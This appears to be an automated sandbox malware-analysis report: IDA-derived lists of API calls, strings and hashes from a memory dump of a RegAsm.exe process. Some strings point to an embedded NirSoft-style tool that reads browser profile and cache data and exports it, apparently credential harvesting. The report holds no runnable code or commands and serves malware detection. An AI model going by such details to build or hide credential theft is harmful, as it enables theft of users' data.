                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                • API String ID: 4111938811-1819279800
                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                • SetCursor.USER32(00000000), ref: 0040129E
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                • String ID:
                                                                                • API String ID: 829165378-0
                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                • memset.MSVCRT ref: 00404200
                                                                                • memset.MSVCRT ref: 00404215
                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 0040426E
                                                                                • memset.MSVCRT ref: 004042CD
                                                                                • memset.MSVCRT ref: 004042E2
                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                • API String ID: 2454223109-1580313836
                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                APIs
                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                • memcpy.MSVCRT ref: 004115C8
                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                • API String ID: 4054529287-3175352466
                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                • API String ID: 2000436516-3842416460
                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                APIs
                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                • String ID:
                                                                                • API String ID: 1043902810-0
                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT ref: 0040E3EC
• memcpy.MSVCRT ref: 0040E407
• memcpy.MSVCRT ref: 0040E422
• memcpy.MSVCRT ref: 0040E43D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3073804840-2252543386
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 2899246560-1542517562
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT ref: 004086DB
• _mbscpy.MSVCRT ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT ref: 0040879D
• CloseHandle.KERNEL32(?), ref: 004087A6
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
APIs
• memset.MSVCRT ref: 0041087D
• memset.MSVCRT ref: 00410892
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
• GetModuleHandleW.KERNEL32(00000000), ref: 00410951
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
• GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
• GetSysColor.USER32(0000000F), ref: 00410999
• DeleteObject.GDI32(?), ref: 004109D0
• DeleteObject.GDI32(?), ref: 004109D6
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1010922700-0
APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• ??3@YAXPAX@Z.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• ??3@YAXPAX@Z.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• ??3@YAXPAX@Z.MSVCRT ref: 00418716
• ??3@YAXPAX@Z.MSVCRT ref: 0041872A
• ??3@YAXPAX@Z.MSVCRT ref: 00418749
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: ??3@$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 4233704886-1717621600
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT ref: 0041234D
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                • String ID: caption
                                                                                • API String ID: 973020956-4135340389
                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                APIs
                                                                                Strings
                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                • API String ID: 1283228442-2366825230
                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                • memset.MSVCRT ref: 004139B8
                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                • memset.MSVCRT ref: 00413A00
                                                                                • memcpy.MSVCRT ref: 00413A1B
                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                • String ID: \systemroot
                                                                                • API String ID: 4173585201-1821301763
                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                • API String ID: 4139908857-2887671607
                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                APIs
                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                • memcpy.MSVCRT ref: 0040C11B
                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                • strchr.MSVCRT ref: 0040C151
